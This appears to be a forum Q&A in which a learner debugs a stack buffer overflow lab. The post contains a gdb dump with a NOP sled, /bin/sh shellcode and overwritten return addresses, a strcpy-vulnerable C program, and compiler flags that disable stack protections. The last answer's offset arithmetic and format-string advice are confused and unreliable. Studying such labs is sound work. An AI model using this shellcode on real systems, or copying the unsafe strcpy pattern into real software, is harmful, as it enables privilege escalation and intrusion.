# Buffer Overflow : segmentation error at 0x90909090

Tags: buffer-overflow, c, shellcode

why am i getting a segmentation fault at a NOP sled isnt it supposed to sled the instructions till it gets to the shell code ?

```
0xbffff030: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff040: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff050: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff060: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff070: 0xc389c031  0x80cd17b0  0x6852d231  0x68732f6e
0xbffff080: 0x622f2f68  0x52e38969  0x8de18953  0x80cd0b42
0xbffff090: 0x41414141  0x41414141  0x41414141  0x41414141
0xbffff0a0: 0x41414141  0x41414141
(gdb) 
0xbffff0a8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbffff0b8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbffff0c8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbffff0d8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbffff0e8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbffff0f8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbffff108: 0x41414141  0x41414141  0x41414141  0x41414141
0xbffff118: 0x41414141  0x41414141
(gdb) 
0xbffff120: 0x41414141  0x41414141  0x41414141  0x41414141
0xbffff130: 0xbffff050  0xbffff050  0xbffff050  0xbffff050
0xbffff140: 0xbffff050  0xbffff050  0xbffff050  0xbffff050
0xbffff150: 0xbffff050  0xbffff050  0xbffff050  0xbffff050
0xbffff160: 0xbffff050  0xbffff050  0xbffff050  0xbffff050
0xbffff170: 0xbffff050  0xbffff050  0xbffff050  0xbffff050
0xbffff180: 0xbffff050  0xbffff050  0xbffff050  0xbffff050
0xbffff190: 0xbffff050  0xbffff050
```

and here is the code:-

```
#include<stdio.h>

int main(int argc, char* argv[]){
    char buf[256];

    if(argc==1){
        printf("Usage: %s input\n",argv[0]);
        exit(0);
    }
    strcpy(buf,argv[1]);
    printf("%s",buf);
}
```

Error message

```
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
```

any ideas ?

Comment: Is your stack executable

Comment: yes it is executable

Comment: How did you compile it

Comment: i tried different things :gcc bf.c -o bof -fno-stack-protector : also the one that included m32 and static i got it from the MIT lecture explaining the buffer overflow but i couldnt find a link to the explaination of the lab

Comment: Try adding -mpreffered-stack-boundary=2 besides that and -no-pie

Comment: gcc -m32 -static -g bf.c -o bof -Wno-depreciated-declaration -fno-stack-protector

Comment: segmentation fault '0xbffff054 in ?? ()' 0xbffff054: 0x90909090 0x90909090 idk which 0xbffff054 it is... the value of the instruction after padding of x41 ?? as it doesnt recognize the value that it is the address it should jmp to ?? or is it the address of x90909090 !

Comment: Take a look at stack layout if you recompiled it, maybe addresses have changed a bit

Comment: it did change and that's why i changed 0xbffff050  to 0xbffff054  which is the address of the NOP.. before recompiling i got a seg fault at x90909090 now im getting the seg fault at either the address or the value i should jmp to its really confusing as when i x 0xbffff054 i get x90909090 . so i guess it didnt jmp and raised error at the value after x41 padding

Comment: You forgot to add -zexecstack while you were compiling. This way you tell that you want stack executable(that is what you want, since you are jumping to the address on the stack)

Comment: @TrynaLearnSomethin did you mean -mpreferred-stack-boundary=2

Comment: @sf_admin yeah, typo

Answer (score 1):

You need to pivot the execution into your nop sled. Usually done by overwriting EIP with the address of your payload on the stack or using a gadget like jmp esp.

Comment: I thought this overwritten the eip 0xbffff130: 0xbffff050  0xbffff050. is that wrong ?

Answer (score 1):

In this case you should use string format attack by using sequence %_%u where _ needs to be replaced by the number of bytes you want to overwrite and %u will help you overwrite the address after those bytes.

Also you could use a buffer overflow attack where you could pass a long string of length in this case as: 256+8+4=268 . (1 bytes extra for instruction,0.5 byte to get to address) so as to overwrite the address where buf is stored.So these 12 bytes are important as they help you reach the address and skip the instruction.